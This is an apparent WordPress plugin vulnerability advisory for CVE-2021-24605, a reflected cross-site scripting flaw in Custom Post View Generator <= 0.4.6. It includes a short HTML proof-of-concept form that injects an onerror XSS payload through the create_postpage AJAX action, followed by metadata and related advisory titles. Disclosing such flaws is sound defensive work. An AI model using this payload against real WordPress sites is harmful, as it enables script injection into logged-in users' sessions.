Custom Post View Generator <= 0.4.6 – Reflected Cross-Site Scripting | CVE 2021-24605 | Plugin Vulnerabilities

Description

The create_post_page AJAX action of the plugin (available to authenticated user) does not sanitise or escape user input before outputting it back in the response, leading to a Reflected Cross-Site issue

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php?action=create_postpage" method="POST">
<input type="text" name="object_type" value='<img src=1 onerror=alert(/xss/)>'>
<input type="submit">
</form>

Affects Plugins

custom-post-view-generator

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Neppah

Submitter

Neppah

Verified

Yes

WPVDB ID

e0be384c-3e63-49f6-b2ab-3024dcd88686

Timeline

Publicly Published

2021-08-10 (about 4 years ago)

Added

2021-08-10 (about 4 years ago)

Last Updated

2022-04-02 (about 3 years ago)

Other

Published

Title

Published

2025-06-12

Title

IndieBlocks < 0.13.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via kind Parameter

Published

2025-05-07

Title

Quran multilanguage Text & Audio < 2.3.24 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-01-24

Title

Target Video Easy Publish < 3.8.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-10-14

Title

Author Bio Box < 3.4.0 - Admin+ Stored Cross-Site Scripting

Published

2019-05-27

Title

SAML SP Single Sign On <= 4.8.72 - Cross-Site Scripting (XSS)